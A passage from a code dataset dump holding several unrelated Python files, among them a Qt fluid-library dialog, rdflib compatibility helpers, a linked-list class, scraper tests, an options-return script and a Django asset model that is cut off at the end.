parameters):\n\n [ name_string, id_string, color_string,\n self.fluid_density_string,\n self.speed_of_sound_string,\n self.impedance_string,\n self.isentropic_exponent_string,\n self.thermal_conductivity_string,\n self.specific_heat_Cp_string,\n self.dynamic_viscosity_string ] = parameters\n\n self.dict_inputs = {}\n\n if self.check_input_name(name_string):\n return\n\n if self.check_input_fluid_id(id_string):\n return\n\n if self.check_input_color(color_string):\n return\n\n if name_string not in self.list_names:\n self.list_names.append(name_string)\n\n if self.fluid_id not in self.list_ids:\n self.list_ids.append(self.fluid_id)\n\n if self.colorRGB not in self.list_colors:\n self.list_colors.append(self.colorRGB)\n\n if self.check_all_inputs():\n return\n \n try:\n config = configparser.ConfigParser()\n config.read(self.fluid_path)\n config[name_string.upper()] = self.dict_inputs\n\n with open(self.fluid_path, 'w') as config_file:\n config.write(config_file)\n \n except Exception as err:\n title = \"Error while saving the fluid data to the file\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return\n\n if self.adding or self.editing: \n self.treeWidget_fluids.clear()\n self.loadList()\n self.adding = False\n self.editing = False\n self.reset_edit_texts()\n\n def confirm_fluid_attribution(self):\n\n if self.clicked_item is None:\n title = \"Empty fluid selection\"\n message = \"Select a fluid in the list before trying to attribute a fluid to the lines.\"\n PrintMessageInput([title, message, window_title1])\n return\n \n if self.check_element_type_of_lines():\n return\n \n try:\n isentropic_exponent = None\n thermal_conductivity = None\n specific_heat_Cp = None\n dynamic_viscosity = None\n list_empty_inputs = []\n\n name = self.clicked_item.text(0)\n identifier = int(self.clicked_item.text(1))\n color = self.clicked_item.text(2)\n fluid_density = float(self.clicked_item.text(3))\n speed_of_sound = float(self.clicked_item.text(4))\n \n title = \"Empty entries in fluid properties\"\n message = \"Please, it is necessary to update the fluid properties or select another fluid in the list \" \n message += \"before trying to 
attribute a fluid to the lines.\"\n message += \"\\n\\nEmpty entries:\\n\"\n \n if self.clicked_item.text(6) != \"\":\n isentropic_exponent = float(self.clicked_item.text(6))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"isentropic exponent\") \n \n if self.clicked_item.text(7) != \"\":\n thermal_conductivity = float(self.clicked_item.text(7))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"thermal conductivity\")\n\n if self.clicked_item.text(8) != \"\":\n specific_heat_Cp = float(self.clicked_item.text(8))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"specific heat Cp\")\n\n if self.clicked_item.text(9) != \"\":\n dynamic_viscosity = float(self.clicked_item.text(9))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"dynamic viscosity\") \n\n if list_empty_inputs != []: \n for label in list_empty_inputs:\n message += \"\\n{}\".format(label) \n PrintMessageInput([title, message, window_title1]) \n return \n \n self.fluid = Fluid( name, \n fluid_density, \n speed_of_sound, \n identifier = identifier, \n color = color,\n isentropic_exponent = isentropic_exponent,\n thermal_conductivity = thermal_conductivity,\n specific_heat_Cp = specific_heat_Cp,\n dynamic_viscosity = dynamic_viscosity )\n\n if self.flagSelection:\n\n if self.lineEdit_selected_ID.text() == \"\":\n return\n\n for line in self.lines_ids:\n self.project.set_fluid_by_line(line, self.fluid)\n \n print(\"[Set Fluid] - {} defined at lines: {}\".format(self.fluid.name, self.lines_typed))\n # self.opv.changeColorEntities(self.lines_ids, self.fluid.getNormalizedColorRGB())\n\n elif self.flagAll:\n\n self.project.set_fluid_to_all_lines(self.fluid)\n lines = self.project.preprocessor.all_lines\n\n print(\"[Set Fluid] - {} defined at all lines.\".format(self.fluid.name))\n # self.opv.changeColorEntities(lines, self.fluid.getNormalizedColorRGB())\n\n self.close()\n\n except Exception as err:\n title = \"Error with the fluid list data\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return\n\n def loadList(self):\n\n self.list_names = []\n self.list_ids = []\n self.list_colors = [] \n\n try:\n config = configparser.ConfigParser()\n config.read(self.fluid_path)\n\n for fluid in config.sections():\n\n rFluid = config[fluid]\n keys = config[fluid].keys()\n\n name = str(rFluid['name'])\n identifier = str(rFluid['identifier'])\n color = str(rFluid['color'])\n fluid_density = str(rFluid['fluid density'])\n speed_of_sound = str(rFluid['speed of sound'])\n impedance = str(rFluid['impedance'])\n\n isentropic_exponent, thermal_conductivity, specific_heat_Cp, dynamic_viscosity = \"\", \"\", \"\", \"\"\n if 'isentropic exponent' in keys:\n isentropic_exponent = str(rFluid['isentropic exponent'])\n if 'thermal conductivity' in keys:\n thermal_conductivity = str(rFluid['thermal conductivity'])\n if 'specific heat Cp' in keys:\n specific_heat_Cp = str(rFluid['specific heat Cp'])\n if 'dynamic viscosity' in keys:\n dynamic_viscosity = str(rFluid['dynamic viscosity'])\n \n load_fluid = QTreeWidgetItem([ name, \n identifier, \n color, \n fluid_density, \n speed_of_sound, \n impedance,\n isentropic_exponent,\n thermal_conductivity,\n specific_heat_Cp,\n dynamic_viscosity ])\n colorRGB = getColorRGB(color)\n self.list_names.append(name)\n self.list_ids.append(int(identifier))\n self.list_colors.append(colorRGB)\n load_fluid.setBackground(2, QBrush(QColor(colorRGB[0], colorRGB[1], colorRGB[2])))\n load_fluid.setForeground(2, QBrush(QColor(colorRGB[0], colorRGB[1], 
colorRGB[2])))\n for i in range(6):\n load_fluid.setTextAlignment(i, Qt.AlignCenter)\n # load_fluid.setForeground(i, QColor(0,0,0))\n self.treeWidget_fluids.addTopLevelItem(load_fluid)\n\n except Exception as err:\n title = \"Error while loading the fluid list data\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n self.close()\n \n def check_add_fluid(self):\n parameters = []\n for lineEdit in self.list_add_lineEdit:\n parameters.append(lineEdit.text())\n self.adding = True\n self.editing = False\n self.check_add_edit( parameters )\n \n def all_fluid_properties_message(self):\n title = \"WARNING - EMPTY ENTRIES IN FLUID INPUTS\"\n message = \"You should input all fluid properties if you are going to use the following acoustic element types: \"\n message += \"wide-duct, LRF fluid equivalent and LRF full.\" \n message += \"\\n\\nEmpty entries:\\n\"\n for label in self.list_empty_inputs:\n message += \"\\n{}\".format(label)\n PrintMessageInput([title, message, window_title2])\n\n def hightlight(self):\n self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 255)\")\n self.treeWidget_fluids.setLineWidth(2)\n\n def remove_hightlight(self):\n self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 0)\")\n self.treeWidget_fluids.setLineWidth(1)\n # t0 = time()\n # dt = 0\n # while dt < 2:\n # dt = time() - t0\n # self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 0)\")\n # self.treeWidget_fluids.setLineWidth(1)\n\n def check_edit_fluid(self):\n if self.lineEdit_name_edit.text() == \"\":\n title = \"Empty fluid selection\"\n message = \"Please, select a fluid in the list to be edited.\"\n PrintMessageInput([title, message, window_title2])\n self.hightlight()\n return\n parameters = []\n for lineEdit in self.list_edit_lineEdit:\n parameters.append(lineEdit.text())\n self.adding = False\n self.editing = True\n self.remove_hightlight()\n self.check_add_edit( parameters ) \n\n def radioButtonEvent(self):\n self.flagAll = self.radioButton_all.isChecked()\n self.flagSelection = self.radioButton_selected_lines.isChecked()\n if self.flagSelection:\n self.lineEdit_selected_ID.setEnabled(True)\n self.lines_ids = self.opv.getListPickedEntities()\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n else:\n self.lineEdit_selected_ID.setText(\"\")\n elif self.flagAll:\n self.lineEdit_selected_ID.setEnabled(False)\n self.lineEdit_selected_ID.setText(\"All lines\")\n\n def on_click_item(self, item):\n # self.current_index = self.tabWidget_fluid.currentIndex()\n self.clicked_item = item\n N = len(self.list_add_lineEdit)\n for i in range(N):\n self.list_add_lineEdit[i].setText(item.text(i))\n self.list_edit_lineEdit[i].setText(item.text(i))\n self.list_remove_lineEdit[i].setText(item.text(i))\n self.temp_fluid_color = item.text(2) \n\n def on_doubleclick_item(self, item):\n self.clicked_item = item\n self.confirm_fluid_attribution()\n \n def double_confirm_action(self):\n confirm_act = QMessageBox.question(\n self,\n \"QUIT\",\n \"Are you sure you want to reset to default fluids library?\",\n QMessageBox.No | QMessageBox.Yes)\n \n if confirm_act == QMessageBox.Yes:\n return False\n else:\n return True\n\n def confirm_fluid_removal(self):\n self.adding = False\n self.editing = False\n try:\n\n if self.lineEdit_name_remove.text() == \"\":\n title = \"Empty fluid selection\"\n message = \"Please, select a fluid in the list before confirm the removal.\"\n PrintMessageInput([title, message, window_title2])\n self.hightlight()\n return\n\n else:\n config = 
configparser.ConfigParser()\n config.read(self.fluid_path)\n config.remove_section(self.lineEdit_name_remove.text().upper())\n with open(self.fluid_path, 'w') as config_file:\n config.write(config_file)\n\n for tag, line in self.dict_tag_to_entity.items():\n if line.fluid.name == self.lineEdit_name_remove.text():\n self.project.set_fluid_by_line(tag, None)\n\n self.treeWidget_fluids.clear()\n self.clicked_item = None\n self.loadList()\n self.reset_remove_texts() \n self.remove_hightlight()\n\n except Exception as err:\n title = \"Error with the fluid removal\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n\n def reset_library_to_default(self):\n if self.double_confirm_action():\n return\n default_fluid_library(self.fluid_path)\n self.treeWidget_fluids.clear()\n self.loadList()\n self.reset_add_texts()\n self.reset_edit_texts() \n self.reset_remove_texts() \n \n def reset_add_texts(self):\n self.lineEdit_name.setText(\"\")\n self.lineEdit_id.setText(\"\")\n self.lineEdit_fluid_density.setText(\"\")\n self.lineEdit_speed_of_sound.setText(\"\")\n self.lineEdit_impedance.setText(\"\")\n self.lineEdit_color.setText(\"\")\n self.lineEdit_isentropic_exponent.setText(\"\")\n self.lineEdit_thermal_conductivity.setText(\"\") \n self.lineEdit_specific_heat_Cp.setText(\"\") \n self.lineEdit_dynamic_viscosity.setText(\"\") \n\n def reset_edit_texts(self):\n self.lineEdit_name_edit.setText(\"\")\n self.lineEdit_id_edit.setText(\"\")\n self.lineEdit_fluid_density_edit.setText(\"\")\n self.lineEdit_speed_of_sound_edit.setText(\"\")\n self.lineEdit_impedance_edit.setText(\"\")\n self.lineEdit_color_edit.setText(\"\")\n self.lineEdit_isentropic_exponent_edit.setText(\"\")\n self.lineEdit_thermal_conductivity_edit.setText(\"\") \n self.lineEdit_specific_heat_Cp_edit.setText(\"\") \n self.lineEdit_dynamic_viscosity_edit.setText(\"\") \n\n def reset_remove_texts(self):\n self.lineEdit_name_remove.setText(\"\")\n self.lineEdit_id_remove.setText(\"\")\n self.lineEdit_fluid_density_remove.setText(\"\")\n self.lineEdit_speed_of_sound_remove.setText(\"\")\n self.lineEdit_impedance_remove.setText(\"\")\n self.lineEdit_color_remove.setText(\"\")\n self.lineEdit_isentropic_exponent_remove.setText(\"\")\n self.lineEdit_thermal_conductivity_remove.setText(\"\") \n self.lineEdit_specific_heat_Cp_remove.setText(\"\") \n self.lineEdit_dynamic_viscosity_remove.setText(\"\") ","sub_path":"data/user_input/model/setup/acoustic/fluidInput.py","file_name":"fluidInput.py","file_ext":"py","file_size_in_byte":34483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498159405","text":"#!/usr/bin/env python3\n\n# Imports\nimport numpy as np\nimport pdb\n\n# Functions\n\n# Classes\nclass Dummy:\n\n def __init__(self, n_labels=5, n_links=500, n_nodes=500):\n\n self.n_labels = n_labels\n self.labels = ['lab-%d' % i for i in range(self.n_labels)]\n\n self.n_links = n_links\n self.links = ['l-%d' % i for i in range(self.n_links)]\n\n self.n_nodes = n_nodes\n self.nodes = ['n-%d' % i for i in range(self.n_nodes)]\n\n self.linkrange = [2,5]\n\n self.node2labels = {}\n self.node2links = {}\n self.link2nodes = {}\n self.link2labels = {}\n self.label2links = {}\n\n def init_networks(self):\n\n \"\"\"\n This initializes the purest network with n subnetworks for the n labels\n\n :return:\n \"\"\"\n\n self.populate_link2labels()\n self.map_label2links()\n self.populate_node2links()\n self.map_link2nodes()\n\n return self\n
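# A minimal sketch of the mapping-inversion pattern used by map_link2nodes
# and map_label2links below: flip a dict of sets into its reverse index.
# Standalone illustration with hypothetical names, not part of the class.
from collections import defaultdict

node2links = {"n-0": {"l-1", "l-2"}, "n-1": {"l-2"}}
link2nodes = defaultdict(set)
for node, links in node2links.items():
    for link in links:
        link2nodes[link].add(node)
print(dict(link2nodes))  # {'l-1': {'n-0'}, 'l-2': {'n-0', 'n-1'}}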
\n def populate_link2labels(self, randn=False):\n\n self.link2labels = {k: self._choose_labels(randn=randn) for k in self.links}\n\n return self\n\n def populate_node2links(self):\n\n self.node2links = {}\n for n in self.nodes:\n lab = np.random.choice(self.labels)\n self.node2links[n] = self._choose_links(self.label2links[lab])\n self.node2labels[n] = {lab}\n\n return self\n\n def map_link2nodes(self):\n\n self.link2nodes = {}\n for n, links in self.node2links.items():\n for l in links:\n if l in self.link2nodes:\n self.link2nodes[l] |= {n}\n else:\n self.link2nodes[l] = {n}\n\n return self\n\n def map_label2links(self):\n\n self.label2links = {}\n for l, labs in self.link2labels.items():\n for lab in labs:\n if lab in self.label2links:\n self.label2links[lab].append(l)\n else:\n self.label2links[lab] = [l]\n\n for lab, links in self.label2links.items():\n self.label2links[lab] = list(set(links))\n\n return self\n\n def _choose_labels(self, randn=False):\n\n return set(np.random.choice(self.labels, np.random.randint(1,self.n_labels) if randn else 1, replace=False))\n\n def _choose_links(self, links=None, n=None):\n\n if not links:\n links = self.links\n\n if n is None:\n n = np.random.randint(self.linkrange[0], self.linkrange[1])\n\n return set(np.random.choice(links, n, replace=False))\n\n def _choose_nodes(self, nodes=None, n=1):\n\n if not nodes:\n nodes = self.nodes\n\n return set(np.random.choice(nodes, n, replace=False))\n\n def multilabel_nodes(self, ratio=0.2):\n\n links = self._choose_links(n=int(np.ceil(self.n_links * ratio)))\n\n for l in links:\n self.link2labels[l] |= self._choose_labels(randn=True)\n if l in self.link2nodes:\n for n in self.link2nodes[l]:\n self.node2labels[n] |= self.link2labels[l]\n\n return self\n\n def write(self, p_data='', labels=True, writemode='w+', header='', dir_dest=''):\n\n if not p_data:\n dataid = ''.join(np.random.choice(list('abcdefgh12345678'), 6))\n dir_dest += '/' if not dir_dest.endswith('/') else ''\n if header:\n p_data = dir_dest + 'dummy_%s-%s.tsv' % (header, dataid)\n else:\n p_data = dir_dest + 'dummy_network-%s.tsv' % dataid\n\n with open(p_data, writemode) as f:\n\n if labels:\n if 'a' not in writemode:\n _ = f.write('nodes\\tlinks\\tlabels\\n')\n for n in self.nodes:\n lab = self.node2labels[n]\n links = self.node2links[n]\n _ = f.write('%s\\t%s\\t%s\\n' % (n, '/'.join(links), '/'.join(lab)))\n\n else:\n if 'a' not in writemode:\n _ = f.write('nodes\\tlinks\\n')\n for n in self.nodes:\n links = self.node2links[n]\n _ = f.write('%s\\t%s\\n' % (n, '/'.join(links)))\n\n return p_data\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
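# A small demo of the \uXXXX escape-expansion idiom used by the rdflib
# compat module in the next record, assuming only well-formed escapes
# appear in the input string.
import re

r_unicodeEscape = re.compile(r"(\\u[0-9A-Fa-f]{4}|\\U[0-9A-Fa-f]{8})")
expanded = r_unicodeEscape.sub(lambda m: chr(int(m.group(0)[2:], 16)), "caf\\u00e9")
print(expanded)  # cafe with an accented e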
t\n\nif t.TYPE_CHECKING:\n import xml.etree.ElementTree as etree\nelse:\n try:\n from lxml import etree\n except ImportError:\n import xml.etree.ElementTree as etree\n\n\ntry:\n etree_register_namespace = etree.register_namespace\nexcept AttributeError:\n\n import xml.etree.ElementTree as etreenative\n\n def etree_register_namespace(prefix, uri):\n etreenative._namespace_map[uri] = prefix\n\n\ndef cast_bytes(s, enc=\"utf-8\"):\n if isinstance(s, str):\n return s.encode(enc)\n return s\n\n\ndef ascii(stream):\n return codecs.getreader(\"ascii\")(stream)\n\n\ndef bopen(*args, **kwargs):\n return open(*args, mode=\"rb\", **kwargs)\n\n\nlong_type = int\n\n\ndef sign(n):\n if n < 0:\n return -1\n if n > 0:\n return 1\n return 0\n\n\nr_unicodeEscape = re.compile(r\"(\\\\u[0-9A-Fa-f]{4}|\\\\U[0-9A-Fa-f]{8})\")\n\n\ndef _unicodeExpand(s):\n return r_unicodeEscape.sub(lambda m: chr(int(m.group(0)[2:], 16)), s)\n\n\nnarrow_build = False\ntry:\n chr(0x10FFFF)\nexcept ValueError:\n narrow_build = True\n\nif narrow_build:\n\n def _unicodeExpand(s):\n try:\n return r_unicodeEscape.sub(lambda m: chr(int(m.group(0)[2:], 16)), s)\n except ValueError:\n warnings.warn(\n \"Encountered a unicode char > 0xFFFF in a narrow python build. \"\n \"Trying to degrade gracefully, but this can cause problems \"\n \"later when working with the string:\\n%s\" % s\n )\n return r_unicodeEscape.sub(\n lambda m: codecs.decode(m.group(0), \"unicode_escape\"), s\n )\n\n\ndef decodeStringEscape(s):\n r\"\"\"\n s is byte-string - replace \\ escapes in string\n \"\"\"\n\n s = s.replace(\"\\\\t\", \"\\t\")\n s = s.replace(\"\\\\n\", \"\\n\")\n s = s.replace(\"\\\\r\", \"\\r\")\n s = s.replace(\"\\\\b\", \"\\b\")\n s = s.replace(\"\\\\f\", \"\\f\")\n s = s.replace('\\\\\"', '\"')\n s = s.replace(\"\\\\'\", \"'\")\n s = s.replace(\"\\\\\\\\\", \"\\\\\")\n\n return s\n # return _unicodeExpand(s) # hmm - string escape doesn't do unicode escaping\n\n\ndef decodeUnicodeEscape(s):\n \"\"\"\n s is a unicode string\n replace ``\\\\n`` and ``\\\\u00AC`` unicode escapes\n \"\"\"\n if \"\\\\\" not in s:\n # Most of times, there are no backslashes in strings.\n # In the general case, it could use maketrans and translate.\n return s\n\n s = s.replace(\"\\\\t\", \"\\t\")\n s = s.replace(\"\\\\n\", \"\\n\")\n s = s.replace(\"\\\\r\", \"\\r\")\n s = s.replace(\"\\\\b\", \"\\b\")\n s = s.replace(\"\\\\f\", \"\\f\")\n s = s.replace('\\\\\"', '\"')\n s = s.replace(\"\\\\'\", \"'\")\n s = s.replace(\"\\\\\\\\\", \"\\\\\")\n\n s = _unicodeExpand(s) # hmm - string escape doesn't do unicode escaping\n\n return s\n\n\n# Migration to abc in Python 3.8\ntry:\n from collections.abc import Mapping, MutableMapping\nexcept:\n from collections import Mapping, MutableMapping\n","sub_path":"venv/lib/python3.9/site-packages/rdflib/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"148999367","text":"from __future__ import annotations \nimport collections \nimport random \nimport heapq \nimport math\nimport bisect\n\n\n\"\"\"\nSuccess\nDetails \nRuntime: 128 ms, faster than 67.47% of Python3 online submissions for UTF-8 Validation.\nMemory Usage: 14.1 MB, less than 28.00% of Python3 online submissions for UTF-8 Validation.\n\"\"\"\n\nclass Solution:\n def validUtf8(self, data: List[int]) -> bool:\n count = 0\n for char in data:\n if count == 0:\n if char >> 3 == 0b11110:\n count = 3\n elif char >> 4 == 0b1110:\n count = 2\n elif char >> 5 
== 0b110:\n count = 1\n elif char >> 7 == 0b1:\n return False\n else:\n if char >> 6 == 0b10:\n count -= 1\n else:\n return False\n return count == 0\n \n\n","sub_path":"M_393_validUtf8.py","file_name":"M_393_validUtf8.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50441296","text":"maxElem = 20\n\n\nclass Node():\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n def __repr__(self):\n return f'{self.val}'\n\n def displayTillEnd(self):\n global maxElem\n\n cur = self\n ans = []\n maxIter = maxElem\n\n while cur and maxIter:\n maxIter -= 1\n ans.append(str(cur.val))\n cur = cur.next\n if ans:\n print(' -> '.join(ans))\n else:\n print('')\n\n\nclass singlyLinkedList():\n def __init__(self):\n self.head = None\n\n def push(self, val, next=None):\n cur = self.head\n if cur == None:\n self.head = Node(val, next)\n else:\n while cur.next:\n cur = cur.next\n cur.next = Node(val, next)\n\n def __repr__(self):\n global maxElem\n ans = []\n cur = self.head\n maxIter = maxElem\n while cur and maxIter:\n maxIter -= 1\n ans.append(str(cur))\n cur = cur.next\n if len(ans):\n return ' -> '.join(ans)\n else:\n return f''\n\n def __len__(self):\n if self.head == None:\n return 0\n else:\n count = 0\n cur = self.head\n while cur:\n count += 1\n cur = cur.next\n return count\n\n def pop(self):\n if self.head:\n if self.head.next == None:\n self.head = None\n else:\n cur = self.head\n while cur.next.next:\n cur = cur.next\n last = cur.next\n del last\n cur.next = None\n\n def delFirst(self):\n if self.head:\n cur = self.head\n del cur\n self.head = self.head.next\n\n @staticmethod\n def display(node):\n cur = node\n ans = []\n while cur:\n ans.append(str(cur.val))\n cur = cur.next\n print(' -> '.join(ans))\n","sub_path":"Day6_Linked_list_2/dataStructure/linkedList.py","file_name":"linkedList.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"441777390","text":"import os\n\nimport pytest\n\nfrom mlscraper import (\n MultiItemScraper,\n SingleItemScraper,\n MultiItemPageSample,\n SingleItemPageSample,\n)\n\n\ndef read_file(relative_path):\n file_path = os.path.join(os.path.dirname(__file__), relative_path)\n with open(file_path) as file:\n html = file.read()\n return html\n\n\n@pytest.fixture\ndef single_basic_train_html():\n return read_file(os.path.join(\"static\", \"single\", \"basic\", \"train.html\"))\n\n\n@pytest.fixture\ndef multi_single_result_page_html():\n return read_file(os.path.join(\"static\", \"multi\", \"single-result-page.html\"))\n\n\n@pytest.fixture\ndef whitespace_html():\n html = b\"\"\"\"\n \n
            \n            \n                Peter \n            \n                Cool-looking guy\n        \n    \"\"\"\n    return html\n\n\ndef test_multi(multi_single_result_page_html):\n    items = [\n        {\"title\": \"One great result!\", \"description\": \"Some description\"},\n        {\"title\": \"Another great result!\", \"description\": \"Another description\"},\n        {\"title\": \"Result to be found\", \"description\": \"Description to crawl\"},\n    ]\n\n    html = multi_single_result_page_html\n    scraper = MultiItemScraper.build([MultiItemPageSample(html, items)])\n    assert scraper.scrape(html) == items\n\n    # optional since they're only human guesses\n    # assert \".result-single\" in scraper.parent_selector\n    # assert scraper.value_selectors == {\"title\": \"h2\", \"description\": \"p\"}\n\n\ndef test_single(single_basic_train_html):\n    data = {\"name\": \"Peter\", \"description\": \"Cool-looking guy\"}\n    samples = [SingleItemPageSample(single_basic_train_html, data)]\n    scraper = SingleItemScraper.build(samples)\n    result = scraper.scrape(single_basic_train_html)\n    assert result == data\n\n\n@pytest.mark.skip(\"not stable\")\ndef test_single_with_whitespace(whitespace_html):\n    data = {\"name\": \"Peter\", \"description\": \"Cool-looking guy\"}\n    samples = [SingleItemPageSample(whitespace_html, data)]\n    scraper = SingleItemScraper.build(samples)\n    result = scraper.scrape(\n        b'Klaus
'\n )\n assert result == {\"name\": \"Klaus\"}\n","sub_path":"tests/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648412928","text":"import pandas as pd\nimport datetime\nMAX_PRICE = 10000\n\ndf = pd.read_csv('data/all_spx_options.csv')\n\n# apply filters\ndf = df[~((df['type'] == 'put') & (df['strike'] - df['underlying_last'] > df['ask'])) & ~((df['type'] == 'c') & (df['underlying_last'] - df['strike'] > df['ask']))]\ndf = df[~((df['type'] == 'put') & (df['strike'] < df['bid']))]\ndf = df[df['bid'] < df['ask']]\ndf = df[(df['ask'] <= MAX_PRICE)]\n\nholidays = set(pd.to_datetime(pd.read_csv('holidays_1990_2020.csv')['date']))\n\ndf['midpoint'] = (df['bid'] + df['ask']) / 2.0\ndf = df.reset_index()\ndf['date'] = pd.to_datetime(df['date'])\n\ng = df.groupby(['expiration','strike','type'])\ndf_list = []\n#print(len(uniques))\nidx = 0\nprint(\"# groups: %d\" % len(g))\n\ndf = df[df['date'].notna() & df['bid'].notna() & df['ask'].notna() & df['expiration'].notna() & df['strike'].notna() & df['type'].notna()]\n\nfor name, group in g:\n# if idx == 10:\n# break\n #print(name)\n #print(group)\n print(idx)\n\n #dat = df.loc[u]\n dat = group\n #print(dat['date'])\n if dat['date'].duplicated().any():\n continue\n dat = dat.sort_values('date').reset_index()\n # if any([x > 2 for x in dat['date']\n #dat['return'] = dat['midpoint'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_1d_ret'] = dat['bid'].shift(-1).shift(1) / dat['ask'].shift(1)\n dat['yest_midpoint_ret'] = dat['midpoint'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_exit_ret'] = dat['bid'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_enter_ret'] = dat['midpoint'].shift(-1).shift(1) / dat['ask'].shift(1)\n\n dat['tmrw_1d_ret'] = dat['bid'].shift(-1) / dat['ask'].shift(1).shift(-1)\n dat['tmrw_midpoint_ret'] = dat['midpoint'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n dat['tmrw_exit_ret'] = dat['bid'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n dat['tmrw_enter_ret'] = dat['bid'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n\n dat['time_from_last_tick'] = (dat['date'].shift(-1).shift(1) - dat['date'].shift(1))\n dat['date_of_last_tick'] = dat['date'].shift(1)\n # dat = dat.iloc[1:]\n # print('dat before len: ', len(dat))\n # dat = dat[(dat['time_from_last_tick'].dt.days == 1) | ((dat['time_from_last_tick'].dt.days == 3) & (dat['date'].dt.weekday == 0))\n\t\t# \t | (((dat['date'] - datetime.timedelta(days=1)).isin(holidays)) & (dat['time_from_last_tick'] == 2))\n\t\t# \t | (((dat['date'] - datetime.timedelta(days=1)).isin(holidays)) & (dat['time_from_last_tick'] == 4) & (dat['date'].dt.weekday==1))]\n # print('dat after len: ', len(dat))\n # print('dat: ', dat[['date','bid','ask','midpoint','tmrw_midpoint_ret','tmrw_1d_ret']])\n\n df_list.append(dat)\n idx += 1\n\n\ndf = pd.concat(df_list)\n\ndate_groups = df.groupby('date')\n\ndf_list = []\nsorted_date_groups = sorted(date_groups.groups)\nfor idx,n in enumerate(sorted_date_groups[:-1]):\n g = date_groups.get_group(n)\n yest_groups = set(date_groups.get_group(sorted_date_groups[idx - 1]).groupby(['strike','expiration','type']).groups)\n tmrw_groups = set(date_groups.get_group(sorted_date_groups[idx + 1]).groupby(['strike','expiration','type']).groups)\n\n g['yest_data'] = [(e[1]['strike'],e[1]['expiration'],e[1]['type']) in yest_groups for e in g.iterrows()]\n g['tmrw_data'] = 
[(e[1]['strike'],e[1]['expiration'],e[1]['type']) in tmrw_groups for e in g.iterrows()]\n df_list.append(g)\n\ndf_out = pd.concat(df_list,axis=0)\n\ndf_out.set_index(['expiration','strike','type'],inplace=True)\ndf_out.to_csv('data/all_spx_options_with_returns.csv')\n","sub_path":"construct_options_returns.py","file_name":"construct_options_returns.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256253538","text":"import random;\nfrom termcolor import colored, cprint\n\nnumber = random.randint(1, 25)\nmaxattempts = 6\nnumber_of_guesses = 0\ncprint('Guess the number between 1 and 25.','green')\n\nwhile number_of_guesses < maxattempts:\n number_of_guesses += 1\n guess = int(input())\n if guess < number:\n cprint('Your guess is too low you have '+str(maxattempts-number_of_guesses)+' tries left.','red')\n if guess > number:\n cprint('Your guess is too high','red')\n\n if guess == number:\n break\n\n \nif guess == number:\n if int(number_of_guesses) < 1:\n cprint('You guessed the number first time!','green')\n else:\n cprint('You guessed the number in ' + str(number_of_guesses) + ' tries!\\nIt was '+str(number),'yellow')\nelse:\n cprint('You did not guess the number, The number was ' + str(number),'red')\n \n","sub_path":"NumberGuesser.py","file_name":"NumberGuesser.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"100841303","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nimport logging\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . import IDC, AssetGroup, AdminUser, SystemUser\n\n__all__ = ['Asset']\nlogger = logging.getLogger(__name__)\n\n\ndef get_default_idc():\n return IDC.initial()\n\n\nclass Asset(models.Model):\n STATUS_CHOICES = (\n ('In use', _('In use')),\n ('Out of use', _('Out of use')),\n )\n TYPE_CHOICES = (\n ('Server', _('Server')),\n ('VM', _('VM')),\n ('Switch', _('Switch')),\n ('Router', _('Router')),\n ('Firewall', _('Firewall')),\n ('Storage', _(\"Storage\")),\n )\n ENV_CHOICES = (\n ('Prod', 'Production'),\n ('Dev', 'Development'),\n ('Test', 'Testing'),\n )\n\n # Important\n ip = models.GenericIPAddressField(max_length=32, verbose_name=_('IP'), db_index=True)\n hostname = models.CharField(max_length=128, unique=True, verbose_name=_('Hostname'))\n port = models.IntegerField(default=22, verbose_name=_('Port'))\n groups = models.ManyToManyField(AssetGroup, blank=True, related_name='assets',\n verbose_name=_('Asset groups'))\n admin_user = models.ForeignKey(AdminUser, null=True, blank=True, related_name='assets',\n on_delete=models.SET_NULL, verbose_name=_(\"Admin user\"))\n system_users = models.ManyToManyField(SystemUser, blank=True,\n related_name='assets',\n verbose_name=_(\"System User\"))\n idc = models.ForeignKey(IDC, blank=True, null=True, related_name='assets',\n on_delete=models.SET_NULL, verbose_name=_('IDC'),)\n is_active = models.BooleanField(default=True, verbose_name=_('Is active'))\n type = models.CharField(choices=TYPE_CHOICES, 